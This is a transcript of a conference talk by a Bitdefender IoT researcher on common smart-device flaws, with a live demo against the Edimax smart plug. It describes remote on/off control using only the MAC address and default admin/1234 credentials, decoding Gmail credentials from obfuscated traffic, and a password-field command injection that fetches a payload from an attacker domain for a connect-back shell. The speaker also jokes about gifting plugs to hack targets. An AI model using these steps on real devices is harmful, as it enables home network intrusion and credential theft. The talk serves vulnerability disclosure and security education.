Now we'll start with Mr. Alex J. Balan. He's the Chief Security Researcher at Bitdefender, and he's preparing a very interesting demos about the IoT vulnerabilities and how you can hack the IoT or exploit the cloud to hack the IoT. Mr. Alex.
So, my name is Alex J. Balan. I work for the cybersecurity company called Bitdefender. We're based out of Romania. We have a lot of focus on basically almost everything that has to do with cybersecurity. My role within the organization is, amongst other things, working with some teams that do vulnerability research on IoT. Basically, we hack cars, we hack power plugs, we hack DVR cameras, and so on and so forth. So today, I would like to share with you some of the methods that we use when we do vulnerability research. If you guys want to hack IoT, this will be the kind of talk that will give you some insight on how to get started in doing that. And also, it's going to show you that hacking IoTs is much easier than hacking virtually everything else. So this was on 9gag last night. I added it to the slide deck. Some guy's smart TV was accessed by a remote phone. And also this was from March last year. So I rented a connected car. It was a Chrysler. It was in San Francisco. And it had this dashboard where you would enter your email address and register the car to your name. And it wasn't set up by the car rental company. And I said, okay, let's try it on and see what happens. And after that, almost each month, so once every 2 or 3 months, I would get status updates from the car with what was going on, like mileage, pressure in the tires, the last revision, and everything else. And this is what an email looks like. You can see I have my monthly vehicle report for my Chrysler, and you can see a lot of stuff in there. So negligence on the part of the car rental company, negligence on the part of Chrysler. And funny enough, when I showed this at DEF CON this year, some lady who worked at Chrysler came over to me and said that actually this was not supposed to happen. Because the way they've designed the cars for rentals is that they reset once a week. So if you register it, it's not supposed to keep sending you emails with its status because it was supposed to reset once a week. So inadvertently and completely by accident, I filed a bug report to Chrysler at DEF CON in August this year. So onwards. One of the first things that I want to point out is that IoT is unavoidable. Whenever I do these kind of talks about IoT security, there's people that tell me that they don't have IoT. They're not passionate about IoT, or that their country is not that big into IoT just yet, because smart gadgets are, well, they're not really needed, and they're maybe expensive, and so on and so forth. So a lot of people tell me that smart gadgets are not very popular in their countries. Well, let me tell you how I see things about this. IoT is not optional and will not be optional in the near future. Everything will become connected, and people will not have the option to buy non-connected devices. I'm going to give you an example. We used to have parallel port printers in the past. Then we had USB printers. Now, virtually all the printers that we buy are network connected. So I don't know what the case is in Egypt, but most of your printers, I assume, are network connected, right? Yes, yes, yes. So we didn't actually realize this. It's a convenience. It's nice to have a network connected printer, but there you go, your first IoT that you realize it's in your network. And mind you, all printers have telnet port open, and most of them have no authentication or weak authentication, like admin. And you can actually see the printer queue and blah, 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 and so on and so forth. So another example would be smart TVs. Again, I don't know what the trend is in Egypt, but in most of the world, it's increasingly difficult to buy a dumb TV, a non-networked TV. You cannot, PlayStations are exclusively dependent on the internet, Xbox the same. There's a European directive that says all power meters have to be connected to the power company via internet. And this is spreading across all Europe. So again, we will not have the option to purchase dumb devices in the near future. So it's increasingly taking over our lives. And it's something that we have to live with. It's something that we have to accept. I mean, tables will become connected. Microphones will become connected. Everything will become connected. And it's crazy. You see all these other gadgets, which may seem like futuristic, but they're going to become standard pretty soon. My favorite is the fish finder, because there's an IoT that finds fish. There's this smart Barbie doll. There's a quick story about this. The Barbie doll interacts with the children and teaches them science. The Barbie doll will talk to your child and say, what's the capital of Egypt? How big is Cairo? How many people it has? How much is 2 times 10? And this kind of thing. So it's a very interactive doll. It's really cool. And it's a really good educational tool for your child. Now, in order to interact with the child, much like other interactive devices, it has a microphone and it listens to ambiental audio for triggers that say, like, hey Google, or hey Siri, or whatever other triggers you have in connected devices. Now, bad guys hacked the Barbie doll and used it to listen to the ambiental audio in people's houses. So it was a paper about it about 1.5 years ago. The power outlet is going to be our demo today, and so on and so forth. Crazy thing, I was visiting this IoT makers convention in Santa Clara about 1.5 years ago. And there's even such a thing as, come on, sorry. This is a thing called Think, T-H-Y-N-C. Now, according to its developers, this device will make you calmer or more energetic. Is the equivalent, if in my small opinion, is the equivalent of electronic marijuana or electronic cocaine, and completely legal. Because you just slap it on your head, and you have this mobile application that interacts with it via Bluetooth, and then you set your mood. If you want to be calm, you set your mood to calm, and then you have a dial of its intensity from 1 to 5. You want to set it to more energetic, you set it to energetic, dial from 1 to 5. Now, this is a very scary scenario because I was using their prototype. It was this, again, IoT builders prototypes. And I'm usually a chill person, pretty calm. And I set it to more energetic. I just wanted to see what it does. I set the dial to 1, I set the dial to 2. When I got to the dial to 3, it was about 25 seconds wearing the thing, I felt this cold shiver down my back, and I blacked out. And it was scary as hell, I don't mind telling you. So I just went, ugh. And my colleague was with me, he grabbed me, and for about 20 minutes I was like this zombie. So this is a very scary thing. I mean, these guys are not the only ones in the market building these things. There's another collar that goes like this, and it does the same thing. And I started to envision scenarios. Have you seen the movie Kingsman? Yes? No? A few of you. In Kingsman, there's this bad guy that provides free SIM cards to everybody and then controls their brains with it en masse. So I was envisioning a scenario like Kingsman where you would hack their servers that build the application, and then through that, you hack all the applications that control these things in the market. And then you would fry everybody's brains using that. So it's a scary but not completely implausible scenario, I'm afraid. So yeah, IoT is crazy, but again, it's unavoidable. So let me tell you some of the things that we found in our research. I'm going to go really quick through this, but it's quite important. The most common issue is undocumented hard-coded passwords. Simply put, we got these nice cameras made by this Chinese company, NeoCoolCam. And the setup process is like this. You set it up, you connect your mobile app to its access point, next, hook it up to your Wi-Fi, and at the end of the setup process, it tells you you need to set a strong admin password. We will not let you finish the setup process unless you set a very strong admin password. And that's good security practice, right? So we do that. But then after we take it apart, we see that they had 2 backdoor users in the firmware that you could use to access the camera. And then we looked it up on Shodan, and we find 270,000 of cameras using that firmware, different brands, different makes, different look and feel, different buttons, different interfaces, different names, but the same firmware. And all of those could be accessed using those 2 backdoor users. This was the presentation that we did at DEF CON this year. So this is unfortunately a very common case. This is the main root cause for the Mirai botnet. When you look at the Mirai source code, you're not going to see admin 1, 2, 3, 4, 5, 6, or not only that. You will see root and SVC Gaudi, which is not an apparently common password. But what happened was somebody took a device apart, saw that password hard-coded in the firmware, and said, oh, look, why don't we try this password on all the devices from this vendor? And unfortunately, it worked. So, for example, you can see here this, not good, sorry. There we go. You can see this handsome, anonymous fellow in a coffee shop in Barcelona taking a picture of himself using the coffee shop's security camera system by simply scanning the local network, finding an IP address that had a web interface in it, trying a backdoor password, and seeing that it works, and he could access the camera system from that coffee shop. The next issue would be weak or no encryption. A lot of these gadgets store sensitive information. Printers would be the first thing that comes to mind. We send contracts, we send payroll documents, we send all kinds of private information to printers, and the communication between an endpoint and the printer is not encrypted. My Amazon Fire Stick has my credit card information, my Gmail account, and my Amazon account. It's not encrypted locally. Thankfully, most of what they're doing is encrypted in transit. The power outlet that we're going to see today uses obfuscation instead of encryption when synchronizing with their cloud. And in the process, they're sending the settings, like its current IP address, MAC address, network it's in, and also my email and password, which it asks for in the process of setting it up. The argument is that they do not have the resources to use encryption because these devices are very small, low resources, low CPU, and so on and so forth. But that's not a good excuse. You can do encryption in a few kilobytes. So yeah. But again, be mindful of the devices that you use because they may leak very private information about your network, maybe corporate or home, to their cloud without encryption. So somebody can intercept that and hijack it. Onwards, a more sophisticated. So just out of curiosity, so we know where we are here, how many of you are familiar with what a command injection attack is? Help me out here. Okay, we can work with that. So a command injection attack enables an attacker to run system commands on the target. Essentially, as you're going to see later on, if you run system commands with external input, then somebody can tamper with that input and change it so the system command executes another command after that. Now, if we are able to execute a command on a target system, then we are able to take over that system, get full system access, and then pivot and do other things. We have a program called the Vulnerability Assessment Program Global. We have identified devices with firmware which was more than 10 years old. And services running on that firmware which were more than 10 years old. We've seen devices that were running SSH version 1.5. We've seen devices that were running Apache version 1.2. And additionally, all the vulnerabilities that come along with that. And I think that the biggest issue of all is bad user interface and firmware updates. Many people ask me, so how do I know if a device is safe? Because I'm not an expert. So nobody is supposed to be an expert. So how do you know that a device is good from a security standpoint? What would be the first thing to check if you're a non-techie or non-hacker user? And the answer is very simple. Always look at one thing, the update mechanism. It's as simple as that. If the device asks you, in the update process, if they ask you to download the binary file, upload it into a web interface, click next, and change the firmware and blah, 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 then that device is going to remain hackable forever. Now, I'm sure you've heard this many times before. Everything is inherently flawed. Even our software, even our infrastructure at Bitdefender. I call it Schrödinger's vulnerability. Just because you haven't discovered it doesn't mean it's not there. If you want to try it out, run a bug bounty program. Our good friends here are part of that. And you're going to see the creativity of hackers. They're going to find things that you could not conceive that would enable them to breach your network. So you always have to update. You always have to change. You can look at Google. Google is a respectable company. They're publishing updates with security fixes on a monthly basis. Microsoft does the same. They have Patch Tuesday for this specific reason. The magic is to have an unattended update system. So that is, do not depend on user interaction. To give you an example, I was part of this meeting with this big telco company in the US, one of the biggest. And their CTO, technical guy, security savvy, ran Linux on his workstation. And he was like this insanely savvy, technical savvy guy. Had this power outlet that we're going to show here. And the guys from Edimax published the update that would patch what we found. They posted it about 6 months before my visit to that guy. And he told me, well, hack my house. And you know what? I did. It was that easy. So I just, OK, are you sure? Yeah. There you go. This is your home network. This is your home Wi-Fi password, and so on and so forth. And again, the update was published. The guy just didn't apply it because the update process was very difficult to understand. So it's very simple. If they have a bad update process, then that device will stay vulnerable forever because nobody will apply it. Now, the more insidious and dangerous issues. Who here is familiar with UPnP? Come on, help me out. Really? Nobody? No? No? One? So UPnP stands for Universal Plug and Play. Now, I'm sure you've seen the news about hundreds of thousands of devices getting hacked and being put part of a botnet. Now, in case you've wondered why that's happening and why those devices are available directly in the internet and why an attacker or a botnet can just punch into somebody's home DVR cameras, now, this is the moment when you learn something important. UPnP is one of the main reasons. Universal Plug and Play enables a device to tell the router to do port forwarding automatically, without user intervention, without user interaction, and unfortunately, very often, without the user's knowledge. So you get a camera, you install it, you set it up, and without you knowing it, your public IP address will now have 2 more open ports, port 80 and port 554, for example, which enable attackers to access that camera directly. This is what UPnP does, and if you haven't checked for it, I strongly suggest that you do an nmap of your public IP address when you have a chance, just to see how much is exposed from your home network without you knowing it. I don't expect all of you to find something, but my guess is that at least 10% of you will find something. Now, this will be the topic for today, device/cloud/mobile app synchronization. There are so many things in this chain that can go wrong. Essentially, everything in this flow can be intercepted, and then everything can be impersonated. If you want to do IoT vulnerability research, one of the first steps for every researcher is to impersonate the mobile app. You take the Android version of the application, you decompile it, and you see what it does in its interaction with the IoT device. And of course, poor input validation leads to command execution. Now, up until today, when you saw IoT presentations, all of them were based on proximity-based attack. I hacked my door lock. I hacked my smart TV. And that's nice. Hacking these gadgets in your own home is fun, but we focus more on the real issues, in my small opinion. So we focus more on devices that can be hacked at a global scale, because these are the things that actually affect the state of the internet today. So this is what we're going to talk about. And also, I just wanted to make this analogy. IoTs are not simply gadgets and hardware. And I'm going to make a crazy analogy, so bear with me. IoTs are just hardware plus operating system plus apps. So you have hardware with BusyBox and an application on top of that. With me so far? Yes? So just like you have hardware, Red Hat 6.2, if anybody remembers it, and VuFTPD on top of that. Just like you would have hardware, Windows, and IIS 5.0. It's from a concept standpoint, literally the same thing. Just like you have hardware and Windows and remote desktop, which is what actually enabled the subway hack, where about 60,000 computers were hacked and a lot of credit cards were stolen in the process. Just like you would have hardware, whatever operating system, in Joomla or WordPress and so on and so forth. This is the exact same stack for everything that gets hacked at this point in time. If it's exposed in the internet and it has a vulnerable application on top of it, that's what gets hacked. So you would have the application talking to the mobile phone, application talking to the cloud, and mobile phone talking to the cloud, talking to the application. In this flow, usually your vector of attack would be to impersonate the mobile phone and understand how authentication works, what's required for the mobile phone to run commands on that application. And you're going to find that very often the case is that not that much is required. The authentication systems are disastrous, and you can just do whatever you want. So moving on, sorry, we get to the topic of the day. The Edimax Smartplug. This one. This is what we're going to hack today. So this little gadget costs about $25. It's insanely popular. From our initial analysis, about 80,000 of these were sold. It can monitor the power usage. It can give you alerts when the power usage goes beyond a certain threshold. So it can, fine-tune your electricity bill. So you can, it can send you email reports with the average user. You can actually stop providing power after a certain threshold, again, so you can manage your utility bills. And you can also turn it on and off remotely if the need be. For example, a lot of people use it to turn on the air conditioning 15 minutes before they get home, so it's not on for the full day. So when they get home, it's nice and cool. but they don't have to leave it running for the full day. So it's a nice gadget to have. There's a lot of people that use this. So we started to look into it, and we took it apart. The first thing that we need to remember here is that it has this MAC address. Let me see if I can zoom here. You see here this MAC address. As you're going to see, this is the only thing needed to hack it. Fun fact, I was doing this exact talk a while back, and the audience was made up of pen testers, exclusively hackers, pen testers, red teams, and so on and so forth. And they got the idea that they will use this, and you can too, to hack their targets. Because it's a nice gift to make, it's cheap. So if you want to hack somebody, you just purchase one of these, and just my gift to you, because you're such a good friend. And the moment they plug it into the home networks, that's it, you're in. So let me run you through what we've done with it. We've mentioned key features. I'm not going to spend too much time on that because the time is short. So as soon as you plug it in, the device sends an initial packet to google.com to make sure that it's online. Then it connects to edimax.com and sends this packet saying, I'm alive, this is my ID, this is my IP address, and blah, blah, blah. So the first thing that caught our eye is this web server running on port 10,000. We started to intercept the connections back and forth from it, and we saw that the application authenticated to the power outlet using this hash. You see authorization basic, YW, blah, blah, blah. Let me zoom in. Mouse. There we go. So you see. This is simple base 64. And it's admin and 1234. And unfortunately, this is the same case for all of these power outlets from this vendor. And we're going to use this later on. The way the interaction with the application works when you're out of your home network is that the power outlet, so where did I put that? Hang on, sorry. Yeah, so the power outlet keeps a constant UDP channel with their server to break through NAT, to use the connection tracking table, if you're familiar with that. Essentially, it enables the cloud to push back messages to the power outlet whenever the application wants to talk to it. The way the authentication works between the application and the power outlet, and this is the magic thing, is the application hashes its username and password. The power outlet hashes its username and password. And the cloud relays those communications. And if the hashes match, then the cloud establishes a sort of a tunnel between the application and the power outlet, and they can communicate and execute commands between each other. But what's really important to understand is that hashing process which happens. So hashing the username and password of the power outlet, hashing the same thing on the application, and if the hashes match, then a communication is established. If the hashes don't match, then it doesn't work. So triggering actions on the power outlet. Unfortunately, it's very easy. And at this point, we're going to start our lab. So I have this small virtual machine here that's going to act as a router for the power outlet. The purpose being so we can analyze the traffic done by the power outlet with the internet. Now, just until this boots, all you need in order to run commands on the power outlet is the MAC address. The username and password is going to be the same on all of them, admin and 1234. So this is how you would turn the device on and off from anywhere in the world. You just send this state command on or off to the Edimax cloud with the MAC address as an identifier. And we have a piece of code that will execute that. Now, give me just 1 second so I can make sure that everything is started here. So first of all, let's stop this. Okay. So I'm going to start a quick access point. Let me just plug the wireless card. These scripts are just for automating stuff, IP addresses, DNS mask queue, and so on and so forth. And now just to make sure that the demos are legit, I will connect to a remote host. Oof. Sorry. I'm going to plug the plug. So this is my IP address. Whatever. So this is my IP address on that remote host, right? So I'm completely outside of this network, United States. And what we're going to try to do is execute a command on the power outlet here from the device in the United States. So let's see if it works. This is the on-off Python script. And this is what we're going to do. Set the value to on or off, which will be the parameter passed on to the Python script. We use the MAC address as an identifier. Did it work? Let's try that again. On. Thank you. Now, this is nice, and again, you can do this with basically all the power outlets from these guys. And as you can see, it's fully remote. It's from outside. And what's really cool about it also, please.
Please get the payload again.
Sorry? Oh, yeah, sure. So what's really interesting is that, again, in this attack, and this is what's really cool about this, you don't need direct access to the power outlet. There's no port forwarding required. Everything is relayed by the Edimax cloud. So hidden behind two firewalls, actually, because it's the modem that I'm using for this connection, and also this other connection, which is the antenna on this Linux. So two firewalls and just punching through. Okay, now we're going to see something a bit more interesting. Let me just pull up and that is email notifications. Now, this power outlet has this functionality to send you emails, as I was saying. Now, strangely enough, during the setup process, it asks you for your email and password. It actually has a pre-filled field for Gmail. Now, one would wonder why they would need my Gmail account and password. Well, apparently because the Edimax guys were cheap and they couldn't be bothered to set up their own SMTP server. So the power outlet will store the SMTP credentials on it. Now, I want to show you something. This is a PCAP. Let me just find it from the power outlet. So, stuff, demos, Edimax plug demo, Edimax PCAP. Oh, I'm sorry, forgot to close this. So this is a pickup of the traffic made by the power outlet whenever you opened up the application. So whenever you open the application to check or turn the power outlet on and off, it synchronizes with their cloud. So as you can see, there's no encryption here. This TCP only, and if we follow the TCP stream, indeed, we're going to see something that looks like garbage. However, we have discovered that this is not encryption, but rather bit flipping. This is our script for decrypting the traffic stream from the power outlet. It's simply bit flipping by 6 bytes backwards. So if you run this on the PCAP, oh, I think I got the wrong PCAP. Sorry. You know what? Let's generate a new one. So I'm going to go here and go like this. TCP dump minus write to new PCAP. And I'm going to trigger a synchronization with the cloud. This should be enough. So this is the new pickup. We just generated it. We're going to save it as a raw stream. And decode it. Oh, yeah, thank you. Yeah, there we go. So this is the information being sent by the power outlet in the internet with that encryption. As you've seen, we didn't do any kind of SSL or TLS. System time version number, not interesting. However, this is interesting. We have the MAC address, we have the SMTP, and we have my email address, and then we have the password somewhere here. There we go. Here's the password. And of course, it's encrypted with that very good encryption algorithm called base64. So if we do a echo dash n base64 minus d, we're going to see the email, and hang on. There should be a password here someplace. There we go, password. Sorry. And there we go, the password, super secret password. And just to show you guys that I'm not bluffing, I'm going to use it on Gmail. So it's genuine. Actually, the power outlet doesn't let you use a Gmail account without validating this. So it actually it's going to authenticate and make sure that research@gmail.com. Now I'm going to ask you nicely not to hack me, but I know that you're going to do it anyway. Confirm. Yeah, sure, why not? But anyway, the fact that I made it to this step means that the password is valid, okay? So in the interest of time, let's move on, because this was fun. I mean, getting email passwords and hijacking encrypted traffic and blah, blah, blah is fun, but we can sniff and decrypt data. We can turn it off and on, as we've seen. Now, what's even better than all of that? So obviously, our aim was that, we want to hack these things, not just turn them on and off. So the command injection vulnerability. As I was saying, if you run system commands with external input, you will have a very bad time. And the only reason why you didn't get hacked so far is because obscurity and people just didn't find out about you yet. This is how the code looks in the Edimax power outlet, in their binary. So let me zoom in here. This is how the hashing goes. So when they check the hash, when they check the password, they go echo-n username password pipe MD5 sum. Now, anybody see anything wrong with this? So if we set the password to the power outlet, instead of admin1234, we set it to ASDF semicolon telnet, then telnet is going to get executed. So we started telnet on the power outlet. I'm sorry for the bad quality of this screenshot. But starting telnet was not good enough because we wanted full RCE. So how can we achieve full RCE from behind a firewall? Connect back shell code, connect back shell, right? Now, our problem was that the password could not be longer than 32 characters. So, and we had BusyBox running on there, so BusyBox is very retarded when it comes to executing commands. They have a very limited range of commands. So what we did, we registered a 2-letter domain. So this is our command sequence that fits into 32 characters to execute in the password field. So it's semicolon cd slash tmp, semicolon ftp get, domain a, this is the local file name, and execute a. So let's do that really quick. And see if it's going to work. So we have a Metasploit handler waiting for us. And we have come on, this script to be downloaded and executed by the power outlet, which will get the Metasploit shell, execute it, and give us a connect back shell. So plug demo, and then we take the MAC address, which is again the only identifier we need. And assuming that it's still online. Okay, I'm afraid it's not online anymore. So, but the good part is that I have backups. So this is a pre-recorded movie of the same thing. It's simply because we're out of time. We have the handler running. This is the command that we're going to execute. It's going to be in base 64. You're going to see the client connecting to the FTP server to download the initial script. And right after that, it executes, so you can see it download the next payload, and we got a shell. So I'm sorry that we had some internet problems here for some reason. But we're out of time, right? I'm sorry. We can talk about it after it, and we can look at how it works. So really, really quick conclusions. Attacks against IoTs are insanely difficult to defend against. Either from us, from Kaspersky, from Symantec, from whatever, Trend Micro, since they're here and they've pushed the product. People will have to get security for smart devices much like they get for their traditional devices. Otherwise, the average user will not know these vulnerabilities exist and will not know how to defend against them. We've already seen IoT botnets. This can lead to full network compromise. And yeah, this was a nice movie about the Edimax update flow, which was, we don't have time for that now. And one last thing that I wanted to show you is this. So this is an initiative that's been going on in Europe and America. And I hope that it's going to happen in the Middle East and Northern Africa, which is a standard for allowing connected devices to be sold in specific markets. At least basic common sense rules like no default passwords, no admin 1234, no open telnet services, and so on and so forth. If you plan to do security research on IoT, you would do the entire world a favor if you did it for mass attacks. But if you want to do it locally, you can do that as well. It's so easy to publish papers and speak at conferences in the field of IoT. You just go into any store, blindly grab anything that has smart on it, go home, and I promise you that in most cases, in 2 weeks, doesn't matter how skilled you are, you're going to have a paper and a presentation for the next security conference. So I encourage everybody to start working on securing IoT and researching IoT securities because the field is so vast that the few of us that are doing this cannot cover absolutely everything. And if we don't do it, they will not patch it, unfortunately. So with that in mind, I would like to thank you and apologize to the organizers for going a bit over time. And I will await your questions now or after the session. Thank you so much. I don't suppose we have time for questions now.
Yeah, we can have time for one question if there is any question for Alex.
Okay, so ask me anything. Please.
Can you repeat it, please? Can you repeat the question again?
How can I connect to Edimax tool without real ID? You connect to it locally.
We're using the MAC address as an identifier. So if you know the MAC address of the power outlet, so if you want to pass it on to somebody and hack their house, just remember the MAC address, because you pass it on to the Edimax cloud and impersonate the application. So you're telling the Edimax, hey, I'm the management application for Edimax. I would like to turn the power outlet on and off, or change the password to whatever. And when you tell that to the Edimax cloud is going to push that command to the power outlet.
Only with MAC address?
Sorry?
Only with MAC address?
Only with MAC address, yeah.
Okay.
Another question over there.
Can you show us the video about the update mechanism? Because the update mechanism looks a lot more interesting. I can push and flow that update to all the devices.
Well, I'm afraid that
How long is it?
you're going to be disappointed. It's 1 minute, less than 1 minute. So you're going to be disappointed because it's like this. We got the update, and it took us to a non-mobile friendly web page, and that's basically where we got stuck because we couldn't do anything else. So again, we were preparing to do a demo, and we see this message saying, do you want to update the firmware? We're like, oh man, we're not going to be able to do the demo because they've patched the vulnerability. But then again, yeah, no, because we couldn't apply it. I mean, we actually tried, and there was no update flow at all. So yeah.
Okay. Thanks, Alex.
Okay, thank you so much.